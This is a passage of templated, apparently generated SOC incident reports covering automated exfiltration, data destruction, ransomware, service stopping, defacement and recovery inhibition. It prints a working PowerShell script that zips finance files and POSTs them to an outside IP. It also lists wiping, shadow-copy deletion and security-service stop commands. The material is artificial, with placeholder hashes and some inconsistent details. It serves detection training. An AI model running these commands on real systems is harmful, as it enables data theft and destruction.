“\\filesrv\finance\reports\*.xlsx”,
“\\filesrv\finance\budgets\*.xlsx”,
“\\filesrv\executive\board\*.docx”,
“C:\Users\kwilson\Documents\*.xlsx”,
“C:\Users\kwilson\Desktop\*.docx”
)
$zipFile = “C:\temp\data_$(Get-Date -Format ‘yyyyMMddHHmm’).zip”
$tempDir = “C:\temp\collect”
New-Item -ItemType Directory -Path $tempDir -Force
foreach ($target in $targets) {
Copy-Item -Path $target -Destination $tempDir -Recurse -ErrorAction SilentlyContinue
}
Compress-Archive -Path $tempDir\* -DestinationPath $zipFile -Force
Remove-Item -Path $tempDir -Recurse -Force
# Exfiltrate
$bytes = [System.IO.File]::ReadAllBytes($zipFile)
$b64 = [System.Convert]::ToBase64String($bytes)
$body = @{data=$b64} | ConvertTo-Json
Invoke-WebRequest -Uri http://185.143.221[.]89/upload -Method POST -Body $body
Remove-Item $zipFile
Start-Sleep -Seconds 1800
}
Automated Exfiltration Log:
09:00 – Script started (scheduled task)
09:01 – First collection: 234 files (45 MB)
09:02 – Exfiltration of 45 MB to 185.143.221[.]89
09:30 – Second collection in progress (detected)
Detection Logic:
Script runs automatically every 30 minutes
Collects data from multiple sensitive locations
Exfiltrates immediately after collection
Pattern matches automated, continuous exfiltration
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Varonis alert
Varonis Console
Confirmed automated exfiltration script
2. Process Investigation
Identify scheduled task
CrowdStrike Falcon
“FinanceBackup” task running PowerShell script
3. User Interview
Contact kwilson
Teams, Phone
User did NOT create script (account compromised)
4. Immediate Action
Isolate host
CrowdStrike
FIN-WS-112 quarantined
5. C2 Blocking
Block destination IP
Palo Alto
185.143.221[.]89 blocked
6. Account Remediation
Disable kwilson account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-161 Summary: T1020 – Automated Exfiltration of 45 MB Every 30 Minutes Status: RESOLVED Resolution: MALICIOUS – Automated Exfiltration Stopped Priority: P1 – CRITICAL Labels: T1020, automated-exfiltration, powershell, varonis, compromised-account Components: Data-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Varonis Data Security Platform.
Alert: “Automated Data Collection Script Detected – Potential Mass Exfiltration”.
User: kwilson@company.com (Finance Manager).
Host: FIN-WS-112.
Script: backup.ps1 running every 30 minutes.
Data: 45 MB exfiltrated in first run.
Time: 2024-03-03 09:30 EST.
Technique: MITRE ATT&CK T1020 – Automated Exfiltration.
2. Technical Analysis:
Attack Chain:
08:30 – kwilson account compromised via phishing
08:45 – Attacker logs into FIN-WS-112 via RDP
08:50 – Attacker creates backup.ps1 script
09:00 – Attacker creates scheduled task “FinanceBackup”
09:01 – First automated run (45 MB exfiltrated)
09:30 – Second run begins; Varonis detects
Script Analysis:
Collection: Files from finance shares, executive shares, local folders
Frequency: Every 30 minutes (ensures new files are captured)
Exfiltration: HTTP POST to 185.143.221[.]89
Persistence: Scheduled task runs as user
Data Exfiltrated (First Run – 45 MB):
Finance reports (23 files) – 18 MB
Budget spreadsheets (12 files) – 15 MB
Executive board documents (5 files) – 8 MB
Personal finance documents (user’s) – 4 MB
Attacker Intent:
Establish persistent, automated exfiltration
Continuously steal new data as it’s created
Evade detection by using small, frequent transfers
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
08:50-09:00 – Script and task created
09:01 – First exfiltration (45 MB)
09:30 – Second run starts
09:30 – Varonis alert
09:32 – SOC investigates
09:33 – Host isolated
09:34 – Script and task removed
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\backup.ps1 (SHA256: a1b2c3d4…)
Scheduled Task:
– “FinanceBackup” (every 30 minutes)
Network:
– Destination: 185.143.221[.]89:80
– Pattern: POST /upload every 30 minutes
Account:
– kwilson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-112 via CrowdStrike.
Disabled scheduled task.
Deleted backup.ps1.
Blocked destination IP at firewall.
Disabled kwilson account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (45 MB in first run).
Notified affected data owners.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to automated exfiltration setup.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Script execution allowed (no application control).
6. Business Impact:
Operational Impact: Finance host offline; user offline.
Data Exposure: 45 MB of financial and executive data exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Automated exfiltration stopped.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented application control.
Enhanced Varonis monitoring for automated collection patterns.
8. Conclusion:
An attacker compromised a finance manager’s account and set up an automated exfiltration script that ran every 30 minutes, stealing 45 MB of data in its first run. Varonis detected the automated pattern and enabled rapid containment before the second run could complete.
Closure Rationale: Automated exfiltration stopped; data exfiltrated (45 MB); account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-03 10:30 EST
122. T1485 – Data Destruction (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-DATA-DESTROY-1485-7842 Alert Time: 2024-03-03 14:15:33 EST Severity: CRITICAL (98/100) Source: Sysmon (Event ID 11 – FileCreate, Event ID 23 – FileDelete) Rule: “Mass File Deletion Detected – Potential Data Destruction” MITRE ATT&CK: T1485 – Data Destruction
Alert Details:
Detection: Mass file deletion from critical file server
Host: FILESRV-01 (Primary File Server) User: SYSTEM (via compromised admin account) Time: 14:00-14:15 EST
File Delete Events (Event ID 23):
14:00-14:15: 12,847 files deleted
Total size: 78 GB
Locations targeted:
\filesrv\finance*.* – 3,456 files (23 GB)
\filesrv\hr*.* – 2,891 files (15 GB)
\filesrv\r&d*.* – 4,234 files (28 GB)
\filesrv\executive*.* – 1,234 files (8 GB)
\filesrv\backups*.* – 1,032 files (4 GB)
Process Details:
Process: cmd.exe (PID: 4789)
Parent: psexec.exe (from attacker workstation)
Command: del /s /q \filesrv\finance*.*
Command: del /s /q \filesrv\hr*.*
Command: del /s /q \filesrv\r&d*.*
Command: del /s /q \filesrv\executive*.*
Command: del /s /q \filesrv\backups*.*
Additional Tools:
SDelete.exe (used for secure deletion on some files)
Cipher.exe /w (used to wipe free space)
Detection Logic:
12,847 files deleted in 15 minutes (mass destruction)
Critical business data targeted (finance, HR, R&D, executive)
Backups also deleted (preventing recovery)
Secure deletion tools used (SDelete, cipher)
Pattern matches ransomware preparation or malicious destruction
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon events
Splunk, Sysmon Logs
Confirmed mass file deletion
2. Process Investigation
Identify source of deletion
CrowdStrike Falcon
psexec.exe from compromised admin workstation
3. Immediate Action
Isolate file server
CrowdStrike, Network ACLs
FILESRV-01 quarantined
4. Backup Restoration
Restore from backups
Veeam Backup
All 78 GB of data restored
5. Account Remediation
Disable compromised admin account
Azure AD, AD
Admin account disabled; password reset
6. Incident Response
Activate disaster recovery
Management, Legal
Data destruction incident declared
Jira Incident Report
Ticket: SOC-2024-162 Summary: T1485 – Mass Data Destruction of 78 GB on File Server Status: RESOLVED Resolution: MALICIOUS – Data Destroyed, Restored from Backups Priority: P1 – CRITICAL Labels: T1485, data-destruction, mass-deletion, sysmon, compromised-admin Components: Data-Security, Backup-Recovery
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 23 (FileDelete).
Alert: “Mass File Deletion Detected – Potential Data Destruction”.
Host: FILESRV-01 (Primary File Server).
Action: 12,847 files (78 GB) deleted.
Time: 2024-03-03 14:15 EST.
Technique: MITRE ATT&CK T1485 – Data Destruction.
2. Technical Analysis:
Attack Chain:
13:30 – Domain admin account (jsmith) compromised via phishing
13:45 – Attacker logs into admin workstation via RDP
13:50 – Attacker uses psexec to access file server
14:00-14:15 – Mass file deletion using del commands
14:10 – Attacker runs SDelete on key directories
14:15 – Sysmon detects
Data Destroyed:
Finance: 3,456 files (23 GB) – financial records, reports
HR: 2,891 files (15 GB) – employee records, payroll
R&D: 4,234 files (28 GB) – source code, designs, IP
Executive: 1,234 files (8 GB) – board minutes, strategy
Backups: 1,032 files (4 GB) – on-server backups
Total: 12,847 files, 78 GB
Destruction Tools:
del /s /q: Recursive quiet deletion
SDelete.exe: Secure file deletion (overwrites data)
cipher.exe /w: Wipes free space (prevents recovery)
Attacker Intent:
Maximum business disruption
Prevent data recovery (secure deletion)
Possibly precursor to ransomware (no ransom note found)
3. Investigation Findings:
Timeline:
13:30 – Admin account compromised
13:45 – Attacker logs in
13:50 – Access to file server
14:00-14:15 – Data destruction
14:15 – Sysmon alert
14:17 – SOC investigates
14:18 – File server isolated
14:20 – Backup restoration begins
Indicators of Compromise (IoCs):
Commands:
– del /s /q \\filesrv\finance\*.*
– del /s /q \\filesrv\hr\*.*
– del /s /q \\filesrv\r&d\*.*
– del /s /q \\filesrv\executive\*.*
– del /s /q \\filesrv\backups\*.*
– SDelete.exe execution
– cipher.exe /w execution
Account:
– jsmith (compromised domain admin)
4. Containment Actions:
Immediate Actions:
Isolated FILESRV-01 via network ACLs.
Disabled jsmith account.
Reset admin password.
Blocked attacker IP at firewall.
Data Recovery:
Restored all 78 GB of data from Veeam backups (off-site).
Verified data integrity (no corruption).
File server back online at 15:30.
Account Remediation:
Reset all domain admin passwords.
Enforced MFA for all admins.
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had access to file server (legitimate).
No file integrity monitoring on server.
6. Business Impact:
Operational Impact: File server offline for 1.5 hours.
Data Exposure: Data destroyed, not stolen (no exfiltration).
Business Disruption: All departments unable to access files for 1.5 hours.
Recovery Cost: Significant (restoration time, incident response).
7. Remediation & Prevention:
Completed Actions:
Data restored from backups.
Account secured.
File server back online.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Moved admin access behind VPN only.
Implemented file integrity monitoring on critical servers.
Enhanced backup frequency (hourly for critical data).
8. Conclusion:
An attacker compromised a domain admin account and systematically destroyed 78 GB of critical business data on the primary file server, including finance, HR, R&D, and executive files. Sysmon detected the mass deletion, and backups enabled full recovery within 1.5 hours.
Closure Rationale: Data destroyed; data restored from backups; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-03 15:30 EST
123. T1486 – Data Encrypted for Impact (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-RANSOMWARE-1486-7842 Alert Time: 2024-03-03 11:30:22 EST Severity: CRITICAL (99/100) Source: CrowdStrike Falcon EDR Rule: “Ransomware Behavior Detected – Mass File Encryption” MITRE ATT&CK: T1486 – Data Encrypted for Impact
Alert Details:
Detection: Process encrypting multiple files and appending .locked extension
Host: ENG-WS-045 (Engineering Workstation) User: rpatel@company.com (Raj Patel, Engineer) Time: 11:15-11:30 EST
Process Details:
Process: C:\Windows\Temp\encrypt.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: cmd.exe
File Encryption Events:
11:15-11:30: 2,847 files encrypted
File extensions changed to .locked
Locations affected:
C:\Users\rpatel\Documents*.* – 1,234 files
C:\Users\rpatel\Desktop*.* – 456 files
C:\Users\rpatel\Downloads*.* – 234 files
D:\engineering_data*.* – 923 files
Ransom Note:
File: README_LOCKED.txt (created in each folder)
Content:
YOUR FILES ARE ENCRYPTED!
All your documents, photos, databases and other important files have been encrypted with RSA-2048.
To recover your files, send 0.5 BTC to: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
Then contact: decrypt@onionmail.org with your personal ID: ENG-7842-045
Detection Logic:
Mass file encryption (2,847 files in 15 minutes)
File extension changes (.locked)
Ransom note dropped
Process from Temp folder
Pattern matches ransomware attack
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed ransomware encryption
2. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
3. Network Block
Block C2 communication
Palo Alto
Blocked outbound connections from host
4. Ransomware Analysis
Identify ransomware variant
CrowdStrike Sandbox
LockBit 3.0 ransomware
5. Backup Restoration
Restore encrypted files
Veeam Backup
All 2,847 files restored
6. Account Remediation
Disable rpatel account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-163 Summary: T1486 – LockBit Ransomware Encrypts 2,847 Files on Engineering Workstation Status: RESOLVED Resolution: MALICIOUS – Files Encrypted, Restored from Backups Priority: P1 – CRITICAL Labels: T1486, ransomware, data-encrypted, lockbit, crowdstrike Components: Endpoint-Security, Backup-Recovery
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Ransomware Behavior Detected – Mass File Encryption”.
Host: ENG-WS-045 (Engineering, user rpatel).
Files: 2,847 files encrypted with .locked extension.
Ransomware: LockBit 3.0.
Time: 2024-03-03 11:30 EST.
Technique: MITRE ATT&CK T1486 – Data Encrypted for Impact.
2. Technical Analysis:
Attack Chain:
10:30 – rpatel account compromised via phishing
10:45 – Attacker logs into ENG-WS-045 via RDP
10:50 – Attacker downloads encrypt.exe (LockBit ransomware)
11:00 – Attacker executes ransomware
11:15-11:30 – Encryption of 2,847 files
11:30 – CrowdStrike detects
Ransomware Analysis:
Variant: LockBit 3.0
Encryption: RSA-2044 + AES-256
Extension: .locked
Note: README_LOCKED.txt
Wallet: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
Contact: decrypt@onionmail.org
Files Encrypted (2,847):
Engineering documents (1,234) – project files, specs
Desktop files (456) – various
Downloads (234) – various
D:\engineering_data (923) – source code, designs, IP
Network Activity:
Attempted C2 communication (blocked)
No lateral movement detected
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
10:50 – Ransomware downloaded
11:00-11:30 – Encryption
11:30 – CrowdStrike alert
11:32 – SOC investigates
11:33 – Host isolated
11:35 – Backup restoration begins
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\encrypt.exe (SHA256: a1b2c3d4…)
– README_LOCKED.txt (multiple locations)
– *.locked files (2,847)
Network:
– C2 attempt (blocked)
– Bitcoin wallet: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
– Email: decrypt@onionmail.org
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked outbound connections from host.
Terminated encrypt.exe process.
Disabled rpatel account.
Reset password.
Data Recovery:
Restored all 2,847 encrypted files from Veeam backups.
Verified file integrity.
Host reimaged before returning to service.
Enterprise-wide Actions:
Scanned for other ransomware indicators (none found).
Enhanced email filtering for phishing.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to ransomware execution.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
User had local admin rights (allowed ransomware to run).
6. Business Impact:
Operational Impact: Engineering host offline for 3 hours.
Data Exposure: 2,847 files encrypted but restored from backups.
Financial Impact: No ransom paid; recovery costs.
7. Remediation & Prevention:
Completed Actions:
Ransomware stopped.
Files restored.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Removed local admin rights from standard users.
Implemented application control.
Enhanced backup frequency.
8. Conclusion:
An attacker compromised an engineering account and deployed LockBit ransomware, encrypting 2,847 files on a local workstation. CrowdStrike detected the ransomware behavior within minutes, enabling isolation and restoration from backups. No ransom was paid.
Closure Rationale: Files encrypted; files restored from backups; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-03 12:30 EST
124. T1489 – Service Stop (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-SERVICE-STOP-1489-7842 Alert Time: 2024-03-03 16:30:45 EST Severity: HIGH (85/100) Source: Splunk Enterprise Security Rule: “Critical Service Stopped – Potential Disruption” MITRE ATT&CK: T1489 – Service Stop
Alert Details:
Correlated Events:
Windows Event ID 7036 (Service Status Change):
Time: 16:15-16:30 EST
Host: SQL-SRV-01 (Primary SQL Server)
Service: MSSQLSERVER (SQL Server)
Action: STOPPED
Reason: “The service terminated unexpectedly”
Event ID 7036 (Additional Services):
16:16: SQL Agent – STOPPED
16:17: Windows Defender – STOPPED
16:18: Windows Firewall – STOPPED
16:19: Volume Shadow Copy – STOPPED
16:20: Backup Service – STOPPED
Process Creation (Event ID 4688):
Time: 16:14 EST
Process: sc.exe
Command: sc stop MSSQLSERVER
Command: sc stop MSSQLSERVERAGENT
Command: sc stop WinDefend
Command: sc stop MpsSvc
Command: sc stop VSS
Command: sc stop backup_service
Network Connection:
Time: 16:22 EST
Process: powershell.exe
Connection to 185.143.221[.]89:443
Detection Logic:
Multiple critical services stopped in sequence
SQL Server (database) targeted
Security services disabled (Defender, Firewall)
Backup services disabled (VSS, backup_service)
Pattern matches attacker preparing for ransomware or data destruction
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Splunk correlation
Splunk ES
Confirmed critical services stopped
2. Process Investigation
Identify sc.exe commands
CrowdStrike Falcon
PowerShell script stopping services
3. User Interview
Contact DBA
Teams, Phone
No legitimate maintenance scheduled
4. Immediate Action
Isolate SQL server
CrowdStrike
SQL-SRV-01 quarantined
5. Service Restoration
Restart all services
PowerShell
Services restarted
6. Account Remediation
Disable compromised account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-164 Summary: T1489 – Critical Services Stopped on SQL Server Status: RESOLVED Resolution: MALICIOUS – Services Restored Priority: P1 – CRITICAL Labels: T1489, service-stop, sql-server, splunk, compromised-account Components: Endpoint-Security, Service-Monitoring
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security.
Alert: “Critical Service Stopped – Potential Disruption”.
Host: SQL-SRV-01 (Primary SQL Server).
Services Stopped: MSSQLSERVER, SQL Agent, Defender, Firewall, VSS, Backup.
Time: 2024-03-03 16:30 EST.
Technique: MITRE ATT&CK T1489 – Service Stop.
2. Technical Analysis:
Attack Chain:
15:30 – DBA account (jsmith) compromised via phishing
15:45 – Attacker logs into SQL-SRV-01 via RDP
16:00 – Attacker downloads PowerShell script
16:14-16:20 – Services stopped via sc.exe commands
16:22 – C2 connection established
16:30 – Splunk detects
Services Stopped:
MSSQLSERVER: Primary database service (critical)
MSSQLSERVERAGENT: SQL job scheduler
WinDefend: Windows Defender (security)
MpsSvc: Windows Firewall (security)
VSS: Volume Shadow Copy (backups)
backup_service: Custom backup service
Attacker Intent:
Disable database access (business disruption)
Disable security tools (avoid detection)
Disable backups (prevent recovery)
Prepare for ransomware deployment
C2 Communication:
Connected to 185.143.221[.]89:443
Downloaded additional tools (blocked)
No ransomware executed before detection
3. Investigation Findings:
Timeline:
15:30 – Account compromised
15:45 – Attacker logs in
16:00 – Script downloaded
16:14-16:20 – Services stopped
16:22 – C2 connection
16:30 – Splunk alert
16:32 – SOC investigates
16:33 – Host isolated
16:34 – Services restarted
Indicators of Compromise (IoCs):
Commands:
– sc stop MSSQLSERVER
– sc stop MSSQLSERVERAGENT
– sc stop WinDefend
– sc stop MpsSvc
– sc stop VSS
– sc stop backup_service
Network:
– C2: 185.143.221[.]89:443
Account:
– jsmith (compromised DBA)
4. Containment Actions:
Immediate Actions:
Isolated SQL-SRV-01 via CrowdStrike.
Restarted all stopped services.
Blocked C2 IP at firewall.
Disabled jsmith account.
Reset password.
Data Protection:
Verified no data encrypted or deleted.
Checked backups (intact).
Host Remediation:
Full scan (no malware found).
Verified no persistence.
5. Root Cause Analysis:
Primary Cause: DBA account compromised via phishing.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Service stop commands not monitored (until Splunk).
6. Business Impact:
Operational Impact: SQL Server offline for 20 minutes (service restart).
Data Exposure: None (services stopped, no data access).
Business Disruption: Applications dependent on SQL affected for 20 minutes.
7. Remediation & Prevention:
Completed Actions:
Services restored.
Account secured.
C2 blocked.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved RDP behind VPN only.
Created alert for critical service stops.
Enhanced monitoring for sc.exe usage.
8. Conclusion:
An attacker compromised a DBA account and stopped critical services on the primary SQL server, including the database engine, security tools, and backup services. Splunk detected the service stop events and enabled rapid restoration before any data could be encrypted or destroyed.
Closure Rationale: Services restored; account secured; no data loss.
Analyst: [Your Name], SOC Analyst Date: 2024-03-03 17:30 EST
125. T1491 – Defacement (Tripwire Detection)
Tripwire Alert Details
Alert ID: TRIPWIRE-DEFACE-1491-7842 Alert Time: 2024-03-03 10:30:22 EST Severity: HIGH (88/100) Source: Tripwire File Integrity Monitoring Rule: “Critical Web File Modified – Potential Defacement” MITRE ATT&CK: T1491.001 – Defacement: Internal Defacement
Alert Details:
File Integrity Alert:
Host: WEB-SRV-01 (Public Web Server) Path: /var/www/html/index.html Expected Hash (baseline): 7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b Current Hash: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4 Modification Time: 10:25 EST
File Content (defaced):
YOU HAVE BEEN HACKED
Your security is pathetic. We have your data.
– Anonymous
Additional Files Modified:
/var/www/html/about.html (same defacement)
/var/www/html/contact.html (same defacement)
/var/www/html/images/logo.png (replaced with hacker logo)
Access Logs:
10:20:22 – POST /admin/upload.php (file upload)
10:21:45 – GET /admin/upload.php (verify upload)
10:22:12 – GET /index.html (verify defacement)
Source IP: 185.143.221[.]89
Detection Logic:
Critical web files modified (anomalous)
Content changed to hacker message
Multiple files affected
Source IP malicious
Pattern matches website defacement
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Tripwire alert
Tripwire Console
Confirmed website defacement
2. Immediate Action
Restore from backup
Web Team
index.html restored to original
3. Vulnerability Assessment
Identify how defacement occurred
WAF Logs, Code Review
File upload vulnerability exploited
4. Patch Vulnerability
Fix file upload
Web Team
Upload script patched
5. IP Blocking
Block attacker IP
Palo Alto, WAF
185.143.221[.]89 blocked
6. PR Response
Manage public visibility
PR Team
Statement prepared; site restored quickly
Jira Incident Report
Ticket: SOC-2024-165 Summary: T1491 – Public Website Defacement Status: RESOLVED Resolution: MALICIOUS – Site Restored, Vulnerability Patched Priority: P2 – MEDIUM Labels: T1491, defacement, website, tripwire, file-integrity Components: Web-Security, Public-Relations
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Tripwire File Integrity Monitoring.
Alert: “Critical Web File Modified – Potential Defacement”.
Host: WEB-SRV-01 (Public Web Server).
Files: index.html, about.html, contact.html defaced.
Time: 2024-03-03 10:30 EST.
Technique: MITRE ATT&CK T1491.001 – Defacement: Internal Defacement.
2. Technical Analysis:
Attack Chain:
10:15 – Attacker scans for vulnerable file upload endpoints
10:20 – Finds /admin/upload.php (no authentication)
10:20 – Uploads malicious HTML files (index.html, etc.)
10:21 – Replaces logo.png with hacker image
10:22 – Verifies defacement
10:25 – Tripwire detects file changes
Defacement Content:
Message: “YOU HAVE BEEN HACKED”
Background: Black with red text
Image: Hacker logo from evil.com
Claim: “We have your data” (false)
Vulnerability:
Endpoint: /admin/upload.php
Issue: No authentication required
Issue: No file type validation
Result: Attacker could overwrite any file
Attacker IP: 185.143.221[.]89 (Bulgaria)
3. Investigation Findings:
Timeline:
10:15 – Attack begins
10:20-10:22 – Defacement
10:25 – Tripwire alert
10:27 – SOC investigates
10:28 – Site restored
10:30 – Vulnerability patched
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
– URL: /admin/upload.php
Files:
– /var/www/html/index.html (defaced)
– /var/www/html/about.html (defaced)
– /var/www/html/contact.html (defaced)
– /var/www/html/images/logo.png (replaced)
4. Containment Actions:
Immediate Actions:
Restored all defaced files from backup.
Replaced logo.png with original.
Blocked attacker IP at firewall and WAF.
Disabled /admin/upload.php temporarily.
Vulnerability Remediation:
Added authentication to upload endpoint.
Implemented file type validation.
Added file integrity monitoring for all web files.
PR Response:
Website down for 5 minutes during restoration.
Statement prepared but not needed (quick recovery).
Monitored social media for mentions (none).
5. Root Cause Analysis:
Primary Cause: Unauthenticated file upload endpoint.
Contributing Factors:
No authentication on admin functions.
No file type validation.
No web application firewall rules for uploads.
6. Business Impact:
Operational Impact: Website offline for 5 minutes.
Reputational Impact: Minimal (quick recovery, few visitors).
Customer Impact: None (B2B site, low traffic at time).
7. Remediation & Prevention:
Completed Actions:
Site restored.
Vulnerability patched.
Attacker blocked.
Technical Controls Enhanced:
Added authentication to all admin functions.
Implemented file type validation.
Deployed WAF rules for upload endpoints.
Enhanced Tripwire monitoring for web files.
8. Conclusion:
An attacker exploited an unauthenticated file upload to deface the public website, replacing multiple pages with hacker content. Tripwire detected the file changes within minutes, enabling rapid restoration. The vulnerability was patched, and the site was back online quickly.
Closure Rationale: Site restored; vulnerability patched; attacker blocked.
Analyst: [Your Name], SOC Analyst Date: 2024-03-03 11:30 EST
End of Batch 25
Ready for your next batch of prompts whenever you are.
Batch 26: Impact Incident Reports
Here are the next 5 detailed SOC incident reports.
126. T1490 – Inhibit System Recovery (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-INHIBIT-RECOVERY-1490-7842 Alert Time: 2024-03-04 09:30:15 EST Severity: CRITICAL (98/100) Source: Microsoft Defender for Endpoint Rule: “Shadow Copy Deletion Detected – Ransomware Precursor” MITRE ATT&CK: T1490 – Inhibit System Recovery
Alert Details:
Detection: Attempt to delete Volume Shadow Copies (system backups) on multiple hosts
Hosts Affected: 12 workstations (Finance, Engineering, HR) Time: 09:15-09:30 EST
Commands Executed (from process creation events):
09:15:22 – vssadmin delete shadows /all /quiet
09:16:45 – wmic shadowcopy delete
09:18:12 – bcdedit /set {default} recoveryenabled No
09:19:33 – bcdedit /set {default} bootstatuspolicy ignoreallfailures
09:20:55 – diskshadow.exe -s C:\Windows\Temp\diskshadow.txt
09:22:18 – wbadmin delete catalog -quiet
09:23:40 – reg add “HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToBackup” /v 1 /t REG_MULTI_SZ /d “C:\*” /f
Diskshadow.txt content:
delete shadows all
reset
Detection Logic:
Multiple backup deletion commands executed in sequence
Commands target Volume Shadow Copies (VSS)
Boot configuration modified to disable recovery
Windows Backup catalog deleted
Registry modified to exclude files from backup
Pattern matches ransomware preparation (inhibit recovery)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alerts
Microsoft 365 Defender
Confirmed shadow copy deletion across 12 hosts
2. Process Investigation
Identify source of commands
CrowdStrike Falcon
PsExec executed from compromised admin workstation
3. Scope Assessment
Determine affected hosts
SCCM, AD
12 workstations identified
4. Immediate Action
Isolate all affected hosts
CrowdStrike
All 12 hosts quarantined
5. Recovery Attempt
Restore shadow copies
vssadmin, PowerShell
No shadow copies remaining (deleted)
6. Account Remediation
Disable compromised admin account
Azure AD, AD
Admin account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-166 Summary: T1490 – Shadow Copies Deleted on 12 Workstations (Ransomware Prep) Status: RESOLVED Resolution: MALICIOUS – Recovery Inhibited, Hosts Isolated Priority: P1 – CRITICAL Labels: T1490, inhibit-recovery, shadow-copy, ransomware, defender, compromised-admin Components: Endpoint-Security, Backup-Recovery
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Shadow Copy Deletion Detected – Ransomware Precursor”.
Hosts: 12 workstations across multiple departments.
Actions: Volume Shadow Copies deleted, boot recovery disabled.
Time: 2024-03-04 09:30 EST.
Technique: MITRE ATT&CK T1490 – Inhibit System Recovery.
2. Technical Analysis:
Attack Chain:
08:30 – Domain admin account (jsmith) compromised via phishing
08:45 – Attacker logs into admin workstation via RDP
08:50 – Attacker uses PsExec to push script to 12 workstations
09:15-09:30 – Commands executed on all 12 hosts
09:30 – Defender alerts
Commands Executed (on each host):
Deleted Volume Shadow Copies (vssadmin, wmic, diskshadow)
Disabled boot recovery (bcdedit)
Deleted Windows Backup catalog (wbadmin)
Modified registry to exclude files from backup
Attacker Intent:
Prevent system recovery via shadow copies
Prepare for ransomware deployment
Ensure maximum impact (no quick recovery)
Compromised Admin Account:
Username: jsmith (Domain Admin)
Compromise Method: Phishing email with malicious link
MFA: Not enabled (now enforced)
3. Investigation Findings:
Timeline:
08:30 – Admin account compromised
08:45 – Attacker logs in
08:50 – PsExec used to distribute script
09:15-09:30 – Commands executed
09:30 – Defender alerts
09:32 – SOC investigates
09:35 – All 12 hosts isolated
09:40 – Admin account disabled
Indicators of Compromise (IoCs):
Commands:
– vssadmin delete shadows /all /quiet
– wmic shadowcopy delete
– bcdedit /set {default} recoveryenabled No
– bcdedit /set {default} bootstatuspolicy ignoreallfailures
– diskshadow.exe -s C:\Windows\Temp\diskshadow.txt
– wbadmin delete catalog -quiet
– reg add “HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToBackup” …
Account:
– jsmith (compromised domain admin)
4. Containment Actions:
Immediate Actions:
Isolated all 12 affected hosts via CrowdStrike.
Disabled jsmith account.
Reset domain admin password.
Blocked attacker IP at firewall.
Recovery Actions:
Verified shadow copies are permanently deleted (no recovery possible).
Initiated reimaging of all 12 workstations from clean images.
Restored user data from network backups (unaffected).
Prevention:
No ransomware was deployed (detected before execution).
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had broad access to workstations.
No alerting on shadow copy deletion (until Defender).
6. Business Impact:
Operational Impact: 12 workstations offline for 4 hours (reimaging).
Data Exposure: No data stolen; local shadow copies lost.
Recovery Impact: Workstations restored from network backups (slower).
7. Remediation & Prevention:
Completed Actions:
Hosts isolated.
Admin account secured.
Shadow copy monitoring enhanced.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Moved admin access behind VPN only.
Created alert for shadow copy deletion.
Implemented endpoint detection for recovery inhibition.
